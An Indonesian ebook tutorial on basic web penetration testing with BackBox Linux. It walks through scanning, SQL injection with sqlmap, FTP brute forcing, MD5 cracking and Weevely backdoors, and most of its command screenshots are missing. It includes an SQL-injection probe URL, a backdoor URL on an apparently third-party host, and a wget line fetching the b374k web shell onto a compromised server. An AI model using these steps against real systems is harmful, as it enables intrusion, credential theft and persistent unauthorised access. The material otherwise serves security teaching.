BackBox Linux - Basic Web Penetration Testing

BackBox Linux – Basic Web Penetration Testing

< Web Penetration Testing > < [email protected] >

w ww.newbie-security.or.id

http://www.newbie-security.or.id/



Diterbitkan Oleh :

Ebook ini dibuat sebagai media pembelajaran. Segala macam materi yang ada didalam ebook iniadalah bentuk implementasi dari tools yang ada pada BackBox Linux itu sendiri.

Ebook ini bebas untuk disebarluaskan dengan syarat tidak mengubah nama penulis dan isi materi yang ada didalamnya.

Credits

DevilScreaM ([email protected])

Reviewers

Casper ([email protected])

Mbah Roni



mailto:[email protected]

mailto:[email protected]



root@backbox:~# ls DAFTAR ISI

Information Gathering

• Web Server Scanning with Nmap …....................................................................

• Web Server Scanning with WhatWeb …..............................................................

Vulnerability Assessment

• Web Server Vulnerability Scanning with Nmap …..............................................

• Web Server Vulnerability Scanning with Nikto …...............................................

• WordPress Vulnerability Scanning …...................................................................

Exploitation

• LFI/RFI with Fimap ….........................................................................................

• SQL Injection with Sqlmap …..............................................................................

Password Attack

• FTP Brute Force with Metasploit ….....................................................................

• FTP Brute Force with Hydra …............................................................................

• FTP Brute Force with Medusa ….........................................................................

Password Cracking

• Hash Identification with Hash-id ….....................................................................

• Password Cracking with John …..........................................................................

• Password Cracking with Fang …..........................................................................

Maintaining Access

• Generate Web Backdoor with Weevely …............................................................

• Back Connect with Weevely …............................................................................

• Weevely in Action …............................................................................................



mailto:root@backbox



Information Gathering

Information Gathering atau yang sering disebut Pencarian Informasi adalah untuk mencari informasi yang ada pada sistem operasi target. Ada beberapa tools yang tersedia di BackBox Linux untuk melakukan pencarian informasi pada target.

Disini kita akan menggunakan tools

• Nmap

• WhatWeb

Dalam penggunaan tools diatas, pastikan anda login sebagai user root atau akses user tertinggi pada sistem operasi BackBox anda.





Web Server Scanning with NmapNmap adalah sebuah tool open source yang digunakan untuk memeriksa jaringan publik seperti webserver ataupun jaringan lokal. Nmap dapat mencari informasi tentang IP, Port, Service yang ada pada sistem operasi web server.

Untuk melihat perintah-perintah yang ada pada Nmap gunakan perintah nmap –help

Contoh perintah untuk mengetahui informasi yang ada pada web server tersebut

Hasil Scanning dari web server tersebut :





Keterangan tentang perintah yang dipakai diatas :

• sS : Melakukan scanning secara silent atau diam-diam

• sV : Melakukan scanning terhadap software yang membuka port 80 (HTTP)

Pada penggunaan contoh diatas, target yang menjadi sasaran adalah IP 192.168.1.1. disana terlihat jelas bahwa web server tersebut menggunakan Apache 2.4.7 dengan sistem operasi Linux Ubuntu.





Web Server Scanning with WhatWebWhatWeb adalah sebuah tool yang digunakan untuk mengetahui beberapa informasi yang ada pada web server.

Untuk mengetahui perintah-perintah yang ada pada WhatWeb, gunakan perintah whatweb –help

Contoh pencarian informasi web server dengan menggunakan perintah

Hasil dari scanning tersebut adalah





Keterangan pada perintah yang dipakai tersebut:

• v : Target IP Server/Web

Pada contoh diatas yang menjadi target adalah IP 192.168.1.1 dan hasil scanning menyatakan bahwa web server tersebut menggunakan Apache 2.4.7, menggunakan sistem operasi Linux Ubuntu.





Vulnerability Assessment

Memanfaatkan tools pencari celah pada suatu web server. Disini kita dapat menggunakan beberapa tools yang sudah disediakan oleh BackBox Linux, antara lain

• Nmap

• Nikto

• WPScan






Web Server Vulnerability Scanning with NmapNmap adalah sebuah tool open source yang digunakan untuk memeriksa jaringan publik seperti webserver ataupun jaringan lokal. Nmap dapat memindai IP, Port, Service yang ada pada sistem operasi web server.

Untuk melihat perintah-perintah yang ada pada Nmap gunakan perintah nmap –help

Contoh perintah untuk mencari celah pada yang ada di web server

Hasil dari Scanning





Keterangan pada perintah yang digunakan :

• v : Menampilkan Versi-Versi Software

• PN : Semua Host yang online

• sS : Melakukan scanning secara silent atau diam-diam

• sV : Melakukan scanning terhadap software yang membuka port 80 (HTTP)

• script=vuln : Menggunakan Script bawaan dari Nmap yang digunakan mencari celah

Pada contoh diatas terlihat bahwa server tersebut memiliki celah Slowloris DOS Attack, dan SQL Injection yang terdapat pada http://192.168.1.1/?C=S;O=A'%20OR%20sqlspider



http://192.168.1.1/?C=S;O=A'%20OR%20sqlspider



Web Server Vulnerability Scanning with NiktoNikto adalah sebuah tool yang dibuat untuk melakukan pengecekkan pada suatu web server apakah web server tersebut terdapat celah ataupun tidak.

Untuk melihat perintah-perintah yang ada pada Nikto gunakan perintah nikto –help

Contoh perintah penggunaan nikto untuk mencari celah pada web server

Hasil dari Scanning

Keterangan pada perintah-perintah yang digunakan

• h : IP Server/Web Target

• p : Port , disini kita menggunakan Port HTTP yaitu 80





WordPress Vulnerability ScanningDisini kita menggunakan tool wpscan yang sudah tersedia di BackBox. Wpscan adalah sebuah tool yang dibuat untuk mencari celah pada sebuah web yang menggunakan Content Management System (CMS) WordPress.

Untuk membuka dan menjalankan tool ini, gunakan perintah cd /opt/wpscan/, untuk masuk ke folder dimana wpscan disimpan, lalu jalankan script dengan perintah berikut:

Hasil Scanning





Keterangan pada perintah-perintah :

• --url : IP Server/Web Target

• --enumerate vp : Mencari Celah pada WordPress Plugin

• --enumerate vt : Mencari Celah pada WordPress Themes

Untuk perintah lainnya, gunakan perintah ./wpscan.rb –help

Pada contoh diatas target penulis adalah http://screamav.web.id (situs pribadi penulis) terlihat disanaada beberapa celah yang dapat di eksploit beserta keterangan celah tersebut.



http://screamav.web.id/



Exploitation

Disini kita memanfaatkan tools yang ada di BackBox untuk melakukan eksploitasi pada web server

Disini kita menggunakan beberapa tools untuk melakukan eksploitasi terhadap web yaitu

• Fimap

• Sqlmap

Dalam penggunaan tool diatas, pastikan anda login sebagai user root atau akses user tertinggi pada sistem operasi BackBox anda.





LFI/RFI with FimapFimap adalah sebuah tool yang digunakan untuk mencoba melakukan injeksi terhadap situs yang terdapat celah LFI atau RFI

Contoh Penggunaan Fimap

Hasil Injeksi





SQL Injection with SqlmapSqlmap adalah sebuah tool yang paling populer digunakan di linux untuk mencoba melakukan injeksi terhadap celah sql pada suatu web.

Tahap pertama

• Mendapatkan nama database

untuk mendapatkan database, kita menggunakan perintah -u dan --dbs

Hasil

Kita sudah mendapatkan nama database dari web tersebut, yaitu acuart





Tahap kedua

• Mendapatkan table pada database

Setelah mendapatkan nama database, selanjutnya kita akan mendapatkan table apa saja yangada pada database web tersebut menggunakan perintah -u dan -D, --tables

Hasil

Table sudah kita dapatkan, yaitu :





Tahap Ketiga

• Melakukan dump dari table dan database

Setelah mendapatkan table yang ada, selanjutnya kita akan mendapatkan kolum apa saja yang ada pada table users tersebut menggunakan perintah -u dan -D, -T –tables

Hasil

Dilihat dari hasil diatas, kita sudah dapat mengetahui apa saja yang dapat dilihat dari hasil dump yang kita gunakan tadi.

Keterangan Perintah yang digunakan :

• -u : URL Target

• -D / --dbs : Nama Database / Mendapatkan nama database

• -T / --tables : Nama Table / Mendapatkan list table

• --dump : Melakukan Dump data





Password Attack

Memanfaatkan beberapa tools yang sangat berguna di BackBox untuk melakukan brute force.

Disini kita dapat menggunakan beberapa tools, yaitu :

• Metasploit (auxiliary/scanner/ftp/ftp_login)

• Hydra

• Medusa






FTP Brute Force with MetasploitMetasploit Framework adalah sebuah penetration tool yang cukup powerfull untuk melakukan penestrasi kedalam sebuah system.

Metasploit Framework bisa juga di katakan sebagai sebuah platform pengembangan untuk membuattool security dan exploit.

Persiapan

• Username List

• Password List

• Target

Jalankan Metasploit

Masukkan perintah berikut untuk menggunakan module auxiliary/scanner/ftp/ftp_login

Lakukan setting terhadap Username List, sebagai contoh penulis membuat username list di /home/devilscream/user.txt menggunakan set USER_FILE

Lakukan setting terhadap Password List, sebagai contoh penulis membuat password list di /home/devilscream/pass.txt menggunakan set PASS_FILE

Setelah itu, tentukan target menggunakan set RHOSTS

Jalankan module





Hasil Brute Force :

Username dan Password FTP sudah berhasil kita dapatkan.Selanjutnya melakukan uji coba apakah Username dan Password itu bisa dengan perintah ftp ip_server

Masukkan Username

Masukkan password





FTP Brute Force with HydraHydra adalah sebuah tool yang dibuat untuk melakukan brute force terhadap suatu web melalui Username list dan Password list yang sudah disiapkan user

Persiapan

• Username List

• Password List

• Target

Contoh penggunaan Hydra :

• Sebagai contoh, penulis menyimpan username list di /home/devilscream/user.txt

• Sebagai contoh, penulis menyimpan password list di /home/devilscream/pass.txt

Hasil





FTP Brute Force with MedusaMedusa adalah sebuah open source tool yang dibuat untuk melakukan brute force pada suatu web server.

Untuk melihat perintah-perintah apa saja yang ada medusa ini, ketikkan perintah medusa –help

Persiapan

• Username List

• Password List

• Target

Contoh penggunaan Medusa untuk melakukan brute force pada suatu FTP Server

Hasil

Keterangan perintah-perintah yang digunakan

• u : Username List

• p : Password List

• h : Host/Target

• M : Module yang akan digunakan





Password Cracking

Tahap ini adalah untuk mengetahui password asli dari sebuah website menggunakan beberapa toolsyang sudah tersedia di BackBox.

Ada beberapa tools yang dapat digunakan yaitu:

• Fang

• John The Ripper

Namun sebelum melakukan cracking, kita harus mengidentifikasikan password tersebut menggunakan tipe apa, kita dapat menggunakan tools

• Hash-id





Hash Identification with Hash-idPada tahap ini, kita akan melakukan identifikasi menggunakan Hash-id.

Hash-id adalah sebuah tool yang digunakan untuk melakukan identifikasi atau cek sebuah tipepassword.

Contoh penggunaan Hash-id

Memasukkan hash





Hasil dari Identifikasi:

Tipe Password yang dapat di identifikasi oleh Hash-id





Password Cracking with JohnJohn the ripper adalah sebuah tool yang digunakan untuk crack password dengan cepat.John digunakan untuk brute force password (mencoba kemungkinan dari kelemahanpassword yang dibuat oleh si admin), John the ripper juga dapat crack password windowsyang berbentuk LM hashes.

Pada kali ini, penulis akan melakukan cracking password dengan hash

21232f297a57a5a743894a0e4a801fc3

Simpan Hash tersebut dengan sebuah file.

Contoh penggunaan John untuk melakukan password cracking

Hasil

21232f297a57a5a743894a0e4a801fc3 = admin

Keterangan perintah yang digunakan

• wordlist : Word List untuk melakukan cracking

• md5.txt : File hash yang akan di crack

• format : Format hash untuk melakukan cracking





Password Cracking with FangFang adalah sebuah open source tool yang digunakan untuk melakukan crackingpassword md5 dengan memanfaatkan fasilitas online cracking password.

Pada kali ini, penulis akan melakukan cracking password dengan hash

21232f297a57a5a743894a0e4a801fc3

Contoh penggunaan Fang untuk melakukan Cracking

Hasil

Tool ini menggunakan 5 fasilitas online cracking antara lain:

• www.md5decryption.com

• www.md5.gromweb.com

• www.md5pass.info

• www.md5.my-addr.com

• www.stringfunction.com



http://www.stringfunction.com/

http://www.md5.my-addr.com/

http://www.md5pass.info/

http://www.md5.gromweb.com/

http://www.md5decryption.com/



Maintaining Access

Maintaining Access adalah tahapan dimana setelah kita mendapatkan akses ke servertarget dan ingin tetap menguasai server tersebut dengan cara menanam backdoor,trojan,rootkit dan lain-lain.

Tool yang kita gunakan pada tahap ini adalah:

• Weevely





Generate Web Backdoor with WeevelyKita akan membuat sebuah web backdoor menggunakan weevely

Weevely adalah sebuah tool backdooring yang digunakan dalam bahasa python dan tersedia di BackBox Linux.

Contoh penggunaan weevely untuk membuat sebuah web backdoor

Perhatikan perintah diatas

• devilscream : Adalah Password Web Backdoor

• /home/devilscream/backdoor.php : Adalah lokasi dimana kita menyimpan file

Dari contoh diatas, backdoor yang kita buat tadi berada di /home/devilscream/backdoor.php dan menggunakan password devilscream

Selanjutnya upload file tersebut ke web server target.





Back Connect with WeevelyPada tahap ini, kita akan melakukan Back Connect terhadap web server yang sudah kita tanami web backdoor.

Contoh penggunaan perintah untuk melakukan back connecting:

Hasil

Keterangan perintah yang digunakan

• http://repo.telkomspeedy.org/backdoor.php: adalah backdoor yang telah di upload

• devilscream : adalah password web backdoor

Jika sudah seperti diatas, artinya kita telah berhasil melakukan Back Connecting ke web server target.



http://repo.telkomspeedy.org/backdoor.php



Weevely in ActionPada tahap ini, kita akan melakukan aksi apa-apa saja yang bisa dilakukan oleh weevely

1. Download File

untuk melakukan download file dari server lain, kita dapat menggunakan perintah wget

wget https://b374k-shell.googlecode.com/files/b374k-2.8.php

2. Melihat informasi tentang kernel

untuk melihat informasi tentang kernel, kita dapat menggunakan perintah uname -a

3. Melihat File

untuk melihat isi dari file, kita dapat menggunakan perintah cat [file]





Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini, tentunya masih banyak kekurangan dan kelemahannya.

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya. Semoga ebook ini berguna bagi para pembaca ebook ini.




Technology

BackBox Linux - Basic Web Penetration Testing